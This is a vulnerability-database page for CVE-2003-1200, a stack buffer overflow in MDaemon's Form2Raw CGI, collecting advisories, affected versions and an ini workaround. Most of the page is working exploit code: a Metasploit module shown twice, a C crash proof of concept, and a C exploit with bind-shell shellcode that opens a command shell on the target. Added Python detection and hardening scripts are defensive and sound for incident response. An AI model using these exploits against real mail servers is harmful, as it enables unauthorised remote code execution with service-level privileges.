CVE-2003-1200
CVSS 7.5
Published: 2003-12-29 00:00:00
Revised: 2016-10-17 22:39:27

[Original] Stack-based buffer overflow in FORM2RAW.exe in Alt-N MDaemon 6.5.2 through 6.8.5 allows remote attackers to execute arbitrary code via a long From parameter to Form2Raw.cgi.


[CNNVD] MDaemon Raw Message Handler Remote Buffer Overflow Vulnerability (CNNVD-200312-066)

        
Alt-N MDaemon is a web-based mail server program.
Alt-N MDaemon has a boundary error in its Raw message handler. A remote attacker can exploit it to carry out a buffer overflow attack and possibly execute arbitrary instructions on the system with the privileges of the process.
FORM2RAW.exe is a CGI program that lets users send email from the web through MDaemon. Sending more than 153 bytes of data in the "From" field to FORM2Raw.exe triggers a stack-based buffer overflow when MDaemon processes the request and creates the Raw file; carefully crafted submitted data may execute arbitrary instructions on the system with the privileges of the process.
        

- CVSS (base score)

CVSS score: 7.5 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:alt-n:mdaemon:6.8.0
cpe:/a:alt-n:mdaemon:6.8.1
cpe:/a:alt-n:mdaemon:6.7.5
cpe:/a:alt-n:mdaemon:6.8.4
cpe:/a:alt-n:mdaemon:6.5.2
cpe:/a:alt-n:mdaemon:6.8.2
cpe:/a:alt-n:mdaemon:6.8.5
cpe:/a:alt-n:mdaemon:6.7.9
cpe:/a:alt-n:mdaemon:6.8.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1200
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1200
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-066
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=107936753929354&w=2
(UNKNOWN)  BUGTRAQ  20040314 Rosiello Security's exploit for MDaemon
http://www.securityfocus.com/archive/1/348454
(VENDOR_ADVISORY)  BUGTRAQ  20031229 [Hat-Squad] Remote buffer overflow in Mdaemon Raw message Handler
http://www.securityfocus.com/bid/9317
(VENDOR_ADVISORY)  BID  9317
http://xforce.iss.net/xforce/xfdb/14097
(UNKNOWN)  XF  mdaemon-form2raw-from-bo(14097)

- Vulnerability information

MDaemon Raw Message Handler Remote Buffer Overflow Vulnerability
High risk  Boundary condition error
2003-12-29 00:00:00 2005-10-20 00:00:00
Remote
        
Alt-N MDaemon is a web-based mail server program.
Alt-N MDaemon has a boundary error in its Raw message handler. A remote attacker can exploit it to carry out a buffer overflow attack and possibly execute arbitrary instructions on the system with the privileges of the process.
FORM2RAW.exe is a CGI program that lets users send email from the web through MDaemon. Sending more than 153 bytes of data in the "From" field to FORM2Raw.exe triggers a stack-based buffer overflow when MDaemon processes the request and creates the Raw file; carefully crafted submitted data may execute arbitrary instructions on the system with the privileges of the process.
        

- Advisories and patches

Temporary workaround:
If you cannot install a patch or upgrade right away, CNNVD recommends the following measures to reduce the threat:
* Temporarily disable FORM2RAW: open \MDaemon\WorldClient\WorldClient.ini in an editor and delete the following two lines:
CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
Vendor patch:
Alt-N
-----
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version:

http://www.altn.com

- Vulnerability information (16812)

MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow (EDBID:16812)
windows remote
2010-07-01 Verified
3000 metasploit
##
# $Id: mdaemon_worldclient_form2raw.rb 9653 2010-07-01 23:33:07Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow',
			'Description'	=> %q{
			This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for
			versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),
			a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,
			by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),
			the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based
			overflow occurs when an excessively long From field is specified.
			The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.
			Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.

			Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very
			reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will
			continue to crash/execute the payload until the CGI output is manually deleted
			from the queue in C:\MDaemon\RawFiles\*.raw.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision: 9653 $',
			'References'    =>
			[
				[ 'CVE', '2003-1200' ],
				[ 'OSVDB', '3255' ],
				[ 'BID', '9317' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 900,
					'BadChars' 		=> "\x00\x0a\x0d%\x20@<>&?|,;=`()${}\#!~\"\xff\/\\",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				# Patrickw - Tested OK-ish 20090702 w2k
				[ 'Universal MDaemon.exe', 	{ 'Ret' => 0x022fcd46 } ], # direct memory jump :(
				[ 'Debugging test',		{ 'Ret' => 0x44434241 } ],
			],
			'DisclosureDate' => 'Dec 29 2003',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(3000),
			],self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /WDaemon\/6\.8\.[0-5]/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = "GET /form2raw.cgi?From=" # Trigger vuln
		sploit << "\x90" * 242 # We set EIP to the middle of this.
		sploit << Rex::Arch::X86.jmp_short(61) # Then jump over some junk memory.. 60 is precise but is a badchar.
		sploit << [target['Ret']].pack('V') + "c" # Return address, plus 1 byte overwrite for ESP... 'c'
		sploit << "&To=#{Rex::Text.rand_text_alpha(12)}@#{Rex::Text.rand_text_alpha(12)}.#{Rex::Text.rand_text_alpha(3)}"
		sploit << "&Body=" + "\x90" * 1 # 1 Byte for short jump.
		sploit << payload.encoded + " HTTP/1.0"

		sock.put(sploit + "\r\n\r\n")
		res = sock.get(3,3)

		if (res =~ /Message spooled but will be deleted if not FROM a valid account/)
			print_status("Payload accepted by WorldClient Form2Raw CGI!")
			print_status("Wait for the Raw Queue to be processed (1 to 60 minutes).")
		else
			print_status("Message not accepted. Vulnerable target?")
		end

		handler
		disconnect
	end
end
		

- Vulnerability information (23501)

Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (1) (EDBID:23501)
windows dos
2003-12-29 Verified
0 Behrang Fouladi
source: http://www.securityfocus.com/bid/9317/info

It has been reported that MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling certain messages with a 'From' field of over 249 bytes. This issue may allow a remote attacker to gain unauthorized access to a system.

Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the vulnerable software in order to gain unauthorized access.

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32")
#define RET  0x1dff160
#define PORT 3000

int main(int argc, char **argv)
{
    SOCKET s = 0;
    WSADATA wsaData;

    if (argc < 2) {
        fprintf(stderr, "MDaemon form2raw.cgi Exploit Written by Behrang Fouladi, "
                        "\nUsage: %s <target ip> \n", argv[0]);
        printf("%d", argc);
        exit(0);
    }

    WSAStartup(MAKEWORD(2, 0), &wsaData);

    s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (INVALID_SOCKET != s) {
        SOCKADDR_IN anAddr;
        anAddr.sin_family = AF_INET;
        anAddr.sin_port = htons(PORT);
        anAddr.sin_addr.S_un.S_addr = inet_addr(argv[1]);

        if (0 == connect(s, (struct sockaddr *)&anAddr, sizeof(struct sockaddr))) {
            static char buffer[500];
            int i;
            memset(buffer, 0, sizeof(buffer));
            strcpy(buffer, "get /form2raw.cgi?From=");
            for (i = 0; i < 244; i++) {
                strcat(buffer, "a");
            }

            strcat(buffer, "bbbb"); // Overwrites EIP
            strcat(buffer, "c");    // One byte left after ESP :-(
            strcat(buffer, "&To=me@hell.org&Subject=hi&Body=hello HTTP/1.0\r\n\r\n");

            send(s, buffer, strlen(buffer), 0);
            printf("Exploit Sent.");
        }
        else printf("Error Connecting to The Target.\n");
        closesocket(s);
    }

    WSACleanup();
    return 0;
}

		

- Vulnerability information (23502)

Alt-N MDaemon 6.x/WorldClient Form2Raw Raw Message Handler Buffer Overflow Vulnerability (2) (EDBID:23502)
windows remote
2003-12-29 Verified
0 Rosiello Security
source: http://www.securityfocus.com/bid/9317/info
 
It has been reported that MDaemon/WorldClient mail server may be prone to a buffer overflow vulnerability when handling certain messages with a 'From' field of over 249 bytes. This issue may allow a remote attacker to gain unauthorized access to a system.
 
Successful exploitation of this issue may allow an attacker to execute arbitrary code in the context of the vulnerable software in order to gain unauthorized access.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#include <errno.h>
#include <windows.h>
#pragma comment(lib, "ws2_32")

// Darn fucking 1337 macro shit
#define ISIP(m) (!(inet_addr(m) == -1))

#define offset 267 //;267 //1024

// hmm :D
#define NOPS "\x90\x90\x90\x90\x90\x90\x90"

struct sh_fix {
    unsigned long _wsasock;
    unsigned long _bind;
    unsigned long _listen;
    unsigned long _accept;
    unsigned long _stdhandle;
    unsigned long _system;
};

struct remote_targets {
    char *os;
    unsigned long sh_addr;
    struct sh_fix _sh_fix;
} target[] = {
    /* Options for your eyes only :D */
    { "Demo                ",
      0x42424242,
      { 0x90909090,
        0x90909090,
        0x90909090,
        0x90909090,
        0x90909090, // <--
        0x90909090 } },

    { "Windows XP HOME [NL]",
      0x014D4DFC,
      { 0x71a35a01,
        0x71a33ece,
        0x71a35de2,
        0x71a3868d,
        0x77e6191d, // <--
        0x77bf8044 } },

    { "Windows XP PRO [NL]",
      0x014D4DFC,
      { 0x71a35a01,
        0x71a33ece,
        0x71a35de2,
        0x71a3868d,
        0x77e6191d, // <--
        0x77bf8044 } }
};

#define NTARGETS (sizeof(target) / sizeof(target[0]))

unsigned char _addy[] = "\x90\x90\x90\x90";

// 116 bytes bindcode for windows (NT-like), port=58821, by silicon :)
// w000w you rule !!
unsigned char shellcode[] =
"\x83\xC4\xEC\x33\xC0\x50\x50\x50\x6A\x06"
"\x6A\x01\x6A\x02\xB8"
"\xAA\xAA\xAA\xAA"
"\xFF\xD0\x8B\xD8\x33\xC0\x89\x45\xF4\xB0"
"\x02\x66\x89\x45\xF0\x66\xC7\x45\xF2\xE5"
"\xC5\x6A\x10\x8D\x55\xF0\x52\x53\xB8"
"\xBB\xBB\xBB\xBB"
"\xFF\xD0\x6A\x01\x53\xB8"
"\xCC\xCC\xCC\xCC"
"\xFF\xD0\x33\xC0\x50\x50\x53\xB8"
"\xDD\xDD\xDD\xDD"
"\xFF\xD0\x8B\xD8\xBA"
"\xEE\xEE\xEE\xEE"
"\x53\x6A\xF6\xFF\xD2\x53\x6A\xF5\xFF\xD2"
"\x53\x6A\xF4\xFF\xD2\xC7\x45\xFB\x41\x63"
"\x6D\x64\x8D\x45\xFC\x50\xB8"
"\xFF\xFF\xFF\xFF"
"\xFF\xD0\x41";

/* The funny thing is that while exploiting this bug one of the addresses
   (see target[1 || 2].sh_addr) had a forbidden character (0x20, aka space). To fix this I wrote
   this addy/mini shellcode to replace the 0x19 (that's not supposed to be there) in the
   SetStdHandle() address inside the shellcode with a 0x20. */

unsigned char _me[] =
"\x33\xC9"              //  xor         ecx,ecx
"\xBE\xAA\xAA\xAA\xAA"  //  mov         esi,offset _shellcode (00421a50)
"\x83\xC1\x1F"          //  add         ecx,1Fh
"\x41"                  //  inc         ecx
"\x66\x89\x4E\x50"      //  mov         word ptr [esi+50h],cx
"\xC6\x46\x51\xE6";     //  mov         byte ptr [esi+51h],0E6h

// now what would this button do ?
// Resolve a dotted quad or hostname to a network-order IPv4 address.
u_long get_ip(char *hostname)
{
    struct hostent *hp;

    if (ISIP(hostname)) return inet_addr(hostname);

    if ((hp = gethostbyname(hostname)) == NULL) {
        fprintf(stderr, "[+] gethostbyname() failed, check that the host exists.\n");
        exit(-1);
    }

    return ((struct in_addr *)hp->h_addr)->s_addr;
}

// Patch the per-target function addresses into the shellcode and the address fix-up stub.
int fix_shellcode(int choise)
{
    unsigned long only_xp = target[choise].sh_addr + strlen(NOPS) + strlen((char *)_me);

    memcpy(_me + 3, (char *)&only_xp, 4);

    // 0xf: offset to the address of WSASocketA
    memcpy(shellcode + 0xf, (char *)&target[choise]._sh_fix._wsasock, 4);

    // 0x30: offset to the address of bind
    memcpy(shellcode + 0x30, (char *)&target[choise]._sh_fix._bind, 4);

    // 0x3a: offset to the address of listen
    memcpy(shellcode + 0x3a, (char *)&target[choise]._sh_fix._listen, 4);

    // 0x46: offset to the address of accept
    memcpy(shellcode + 0x46, (char *)&target[choise]._sh_fix._accept, 4);

    // 0x4f: offset to the address of SetStdHandle
    memcpy(shellcode + 0x4f, (char *)&target[choise]._sh_fix._stdhandle, 4);

    // 0x6e: offset to the address of system
    memcpy(shellcode + 0x6e, (char *)&target[choise]._sh_fix._system, 4);

    return 0;
}

/// oooh yeah uuuh right .... Crap dont you uuh yeah at me you know me !
int usage(char *what)
{
    int i;

    fprintf(stdout, "Copyright © Rosiello Security\n");
    fprintf(stdout, "http://www.rosiello.org\n\n");
    fprintf(stdout, "Usage %s <target host> <target number>\n", what);
    fprintf(stdout, "Target Number\t\tTarget Name\t\t\t\tStack Address\n");
    fprintf(stdout, "=============\t\t===========\t\t\t\t=============\n");

    for (i = 0; i < (int)NTARGETS; i++)
        fprintf(stdout, "%d\t\t\t%s\t\t0x%08lx\n", i, target[i].os, target[i].sh_addr);

    exit(0);
}

int main(int argc, char **argv)
{
    char buffer[offset * 4] = "get /form2raw.cgi?From=", *ptr, *address;
    SOCKET sd;
    int oops, i, choise;
    struct sockaddr_in ooh;
    WSADATA wsadata;

    WSAStartup(0x101, &wsadata);

    if (argc < 3) usage(argv[0]);
    address = argv[1];
    choise = atoi(argv[2]);
    if (choise < 0 || choise >= (int)NTARGETS) usage(argv[0]);
    fix_shellcode(choise);

    fprintf(stdout, "[+] Winsock initialized\n");

    /* Let's start making a little setup.
       Change the port if you have to. */
    ooh.sin_addr.s_addr = get_ip(address);
    ooh.sin_port        = htons(3000);
    ooh.sin_family      = AF_INET;

    fprintf(stdout, "[+] Trying to connect to %s:%d\n", address, 3000);

    // ok ok here's your sock()
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sd == INVALID_SOCKET) { fprintf(stderr, "[!] socket() failed.\n"); exit(-1); }

    fprintf(stdout, "[+] socket initialized\n");

    /* Initializing the exploiting buffer; read the file comments for the details */
    ptr = buffer + strlen(buffer);

    for (i = strlen(buffer); i < offset; i++) *ptr++ = (char)0x40;

    sprintf(buffer + strlen(buffer), "%s%s&To=airsupply@0x557.org&Subject=hi&Body=%s%s%s HTTP/1.0\r\n\r\n",
            (char *)&target[choise].sh_addr, (char *)_addy, NOPS, (char *)_me, (char *)shellcode);

    //memcpy(buffer+35,shellcode,strlen(shellcode));

    fprintf(stdout, "[+] Overflowing string is prepared\n");

    // Knock knock ... hi i want to hook up with you
    oops = connect(sd, (struct sockaddr *)&ooh, sizeof(ooh));
    if (oops != 0) { fprintf(stderr, "[!] connect() failed.\n"); closesocket(sd); exit(-1); }

    // yep we're in :D
    fprintf(stdout, "[+] Connected\n");

    // Sending some dangerous stuff
    i = send(sd, buffer, strlen(buffer), 0);
    if (i == SOCKET_ERROR) { fprintf(stderr, "[!] send() failed\n"); closesocket(sd); exit(-1); }

    fprintf(stdout, "[+] Overflowing string has been sent\n");

    // Bring in the cleaners !!
    closesocket(sd);
    WSACleanup();

    // [EOF]
    return 0;
}
		

- Vulnerability information (F83045)

MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Overflow (PacketStormID:F83045)
2009-11-26 00:00:00
patrick  metasploit.com
exploit,web,overflow,cgi
CVE-2003-1200

This Metasploit module exploits a stack overflow in Alt-N MDaemon SMTP server for versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default), a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe, by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default), the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based overflow occurs when an excessively long From field is specified. The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes. Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait. Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will continue to crash/execute the payload until the CGI output is manually deleted from the queue in C:\MDaemon\RawFiles\*.raw.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Overflow',
			'Description'	=> %q{
			This module exploits a stack overflow in Alt-N MDaemon SMTP server for
			versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),
			a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,
			by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),
			the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based
			overflow occurs when an excessively long From field is specified.
			The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.
			Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.
			
			Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very
			reliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will
			continue to crash/execute the payload until the CGI output is manually deleted
			from the queue in C:\MDaemon\RawFiles\*.raw.
			},
			'Author' 	=> [ 'patrick' ],
			'Arch'		=> [ ARCH_X86 ],
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'CVE', '2003-1200' ],
				[ 'OSVDB', '3255' ],
				[ 'BID', '9317' ],
			],
			'Privileged'		=> true,
			'DefaultOptions'	=>
			{
				'EXITFUNC'	=> 'thread',
			},
			'Payload'		=>
				{
					'Space'			=> 900,
					'BadChars' 		=> "\x00\x0a\x0d%\x20@<>&?|,;=`()${}\#!~\"\xff\/\\",
					'StackAdjustment' 	=> -3500,
				},
			'Platform' => ['win'],
			'Targets'  =>
			[
				# Patrickw - Tested OK-ish 20090702 w2k
				[ 'Universal MDaemon.exe', 	{ 'Ret' => 0x022fcd46 } ], # direct memory jump :(
				[ 'Debugging test',		{ 'Ret' => 0x44434241 } ],
			],
			'DisclosureDate' => 'Dec 29 2003',
			'DefaultTarget' => 0))

			register_options(
			[
				Opt::RPORT(3000),
			],self.class)
	end

	def check
		connect
		sock.put("GET / HTTP/1.0\r\n\r\n")
		banner = sock.get(-1,3)
		disconnect

		if (banner =~ /WDaemon\/6\.8\.[0-5]/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect

		sploit = "GET /form2raw.cgi?From=" # Trigger vuln
		sploit << "\x90" * 242 # We set EIP to the middle of this.
		sploit << Rex::Arch::X86.jmp_short(61) # Then jump over some junk memory.. 60 is precise but is a badchar.
		sploit << [target['Ret']].pack('V') + "c" # Return address, plus 1 byte overwrite for ESP... 'c'
		sploit << "&To=#{Rex::Text.rand_text_alpha(12)}@#{Rex::Text.rand_text_alpha(12)}.#{Rex::Text.rand_text_alpha(3)}"
		sploit << "&Body=" + "\x90" * 1 # 1 Byte for short jump.
		sploit << payload.encoded + " HTTP/1.0"

		sock.put(sploit + "\r\n\r\n")
		res = sock.get(3,3)

		if (res =~ /Message spooled but will be deleted if not FROM a valid account/)
			print_status("Payload accepted by WorldClient Form2Raw CGI!")
			print_status("Wait for the Raw Queue to be processed (1 to 60 minutes).")
		else
			print_status("Message not accepted. Vulnerable target?")
		end

		handler
		disconnect
	end
end
    

- Vulnerability information

3255
MDaemon Form2Raw CGI From Parameter Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Commercial

- Vulnerability description

The MDaemon mail server contains a flaw in a CGI application called 'Form2Raw.exe'. This CGI is used to send raw email messages through the HTTP protocol. A stack overflow condition can be triggered in this application by sending a request which contains a From parameter of more than 153 bytes. This overflow can be exploited remotely by an unauthenticated attacker to execute arbitrary code in the context of the MDaemon service (normally LocalSystem).
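The CNNVD description earlier on the page and the OSVDB description above state the same trigger condition: a request to Form2Raw.cgi whose From parameter exceeds 153 bytes, and the Metasploit module notes add that the poisoned CGI output stays in the Raw queue (C:\MDaemon\RawFiles\*.raw) until it is removed. The following Python is an added detection example written for this page, not code from any of the referenced advisories or exploits. It flags HTTP request lines (captured in front of WorldClient by a proxy or packet capture) that carry an oversized From to /form2raw.cgi, and scans queued message text for an oversized From: header so a poisoned file can be found during triage. The sample request lines and the RAW file layout (a plain From: header line followed by a blank line) are constructed assumptions; the 153-byte limit is the advisory's figure.

```python
"""Detection helpers for CVE-2003-1200 (Form2Raw oversized From parameter)."""
import re
from urllib.parse import unquote_to_bytes, urlsplit

# Threshold taken from the advisory: more than 153 bytes in From overflows the stack buffer.
FROM_LIMIT = 153

# Constructed sample HTTP request lines (not real traffic). The third mirrors the shape of
# the published proofs of concept: a From value of 244 'a' + 'bbbb' + 'c' = 249 bytes.
SAMPLE_REQUESTS = [
    "GET /WorldClient.dll?View=Main HTTP/1.0",
    "GET /form2raw.cgi?From=alice%40example.invalid&To=bob@example.invalid&Subject=hi&Body=hello HTTP/1.0",
    "GET /form2raw.cgi?From=" + "a" * 244 + "bbbbc" + "&To=me@example.invalid&Subject=hi&Body=hello HTTP/1.0",
]

# Constructed sample of a queued message. The header layout (one "From:" header line, headers
# terminated by a blank line) is an assumption about the RAW format, not taken from the advisory.
SAMPLE_RAW_FILE = "From: " + "a" * 200 + "\r\nTo: bob@example.invalid\r\nSubject: hi\r\n\r\nhello\r\n"


def from_param_length(query):
    """Byte length of the longest From parameter in a query string, after percent-decoding.

    The CGI sees the decoded value, so the check is made on decoded bytes; '+' is treated as
    a space as in application/x-www-form-urlencoded data.
    """
    longest = 0
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "from":  # case-insensitive match is an assumption about the CGI
            longest = max(longest, len(unquote_to_bytes(value.replace("+", " "))))
    return longest


def inspect_request(request_line):
    """Classify one HTTP request line: (targets_form2raw, from_length, oversized)."""
    parts = request_line.split()
    if len(parts) < 2:
        return (False, 0, False)
    url = urlsplit(parts[1])
    if url.path.lower() != "/form2raw.cgi":
        return (False, 0, False)
    length = from_param_length(url.query)
    return (True, length, length > FROM_LIMIT)


def scan_requests(lines):
    """Return [(line_index, from_length)] for every request that would overflow the From buffer."""
    hits = []
    for idx, line in enumerate(lines):
        targets, length, oversized = inspect_request(line)
        if targets and oversized:
            hits.append((idx, length))
    return hits


def oversized_from_headers(raw_text):
    """Byte lengths of From: header values in queued RAW text that exceed FROM_LIMIT.

    Useful when triaging *.raw files left in the queue: the Metasploit notes say MDaemon
    re-processes a poisoned file on every queue run until it is deleted.
    """
    lengths = []
    for line in raw_text.split("\r\n"):
        if not line:
            break  # blank line ends the header block (assumed layout)
        m = re.match(r"(?i)from:\s*(.*)$", line)
        if m:
            n = len(m.group(1).encode("utf-8"))
            if n > FROM_LIMIT:
                lengths.append(n)
    return lengths


if __name__ == "__main__":
    print(scan_requests(SAMPLE_REQUESTS))           # [(2, 249)]
    print(oversized_from_headers(SAMPLE_RAW_FILE))  # [200]
```

The 249-byte sample matches the "over 249 bytes" figure quoted in the Bugtraq summaries on this page, while the check itself uses the advisory's 153-byte limit, so shorter but still overflowing values are caught too.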

- Timeline

2003-12-30 2003-12-30
2003-12-29 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: remove the following two lines from the configuration file located at \MDaemon\WorldClient\WorldClient.ini:
CgiBase2=/Form2Raw.cgi
CgiFile2=C:\MDaemon\CGI\Form2Raw.exe
MDaemon must be restarted to activate these changes.
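The workaround above, like the CNNVD workaround earlier on the page, consists of removing the CgiBase2/CgiFile2 lines from WorldClient.ini. The following Python is an added example, not Alt-N's or CNNVD's code: it reports whether an ini text still maps the Form2Raw CGI and returns the hardened text with those lines dropped, leaving every other line untouched. The sample ini content (the section name and the WorldClient CGI lines) is constructed for illustration; matching any CgiBaseN/CgiFileN index rather than only index 2 is a generalisation beyond the two lines the page shows.

```python
"""Check and apply the CVE-2003-1200 workaround in WorldClient.ini."""
import re

# Constructed sample of the relevant part of \MDaemon\WorldClient\WorldClient.ini.
# The section name and the CgiBase1/CgiFile1 lines are assumptions; the two Form2Raw
# lines are the ones the advisory names.
SAMPLE_INI = (
    "[WorldClient]\r\n"
    "CgiBase1=/WorldClient.cgi\r\n"
    "CgiFile1=C:\\MDaemon\\CGI\\WorldClient.exe\r\n"
    "CgiBase2=/Form2Raw.cgi\r\n"
    "CgiFile2=C:\\MDaemon\\CGI\\Form2Raw.exe\r\n"
)

# A CgiBaseN/CgiFileN key whose value refers to Form2Raw. The advisory shows index 2;
# accepting any index also covers installs where the mapping sits in another slot.
FORM2RAW_MAPPING = re.compile(r"^\s*Cgi(Base|File)\d+\s*=.*form2raw", re.IGNORECASE)


def form2raw_mapping_lines(ini_text):
    """Return (line_number, line) pairs that still map the Form2Raw CGI (1-based numbers)."""
    return [(n, line) for n, line in enumerate(ini_text.splitlines(), 1)
            if FORM2RAW_MAPPING.match(line)]


def form2raw_enabled(ini_text):
    """True if the ini still exposes Form2Raw, i.e. the workaround has not been applied."""
    return bool(form2raw_mapping_lines(ini_text))


def disable_form2raw(ini_text):
    """Return the ini text with the Form2Raw mapping lines removed; all other lines are kept.

    The original line ending (CRLF or LF) and trailing newline are preserved so the file
    round-trips cleanly. Per the advisory, MDaemon must be restarted afterwards; writing the
    file back and restarting the service are left to the operator.
    """
    newline = "\r\n" if "\r\n" in ini_text else "\n"
    kept = [line for line in ini_text.splitlines() if not FORM2RAW_MAPPING.match(line)]
    trailing = newline if ini_text.endswith(("\r\n", "\n")) else ""
    return newline.join(kept) + trailing


if __name__ == "__main__":
    for number, line in form2raw_mapping_lines(SAMPLE_INI):
        print(f"line {number}: {line}")
    hardened = disable_form2raw(SAMPLE_INI)
    print(hardened)
    print("Form2Raw still enabled:", form2raw_enabled(hardened))  # False
```

Running the check again on the hardened text returns False, and applying disable_form2raw a second time is a no-op, which makes it safe to use as an idempotent compliance check on the vendor's temporary workaround.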

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
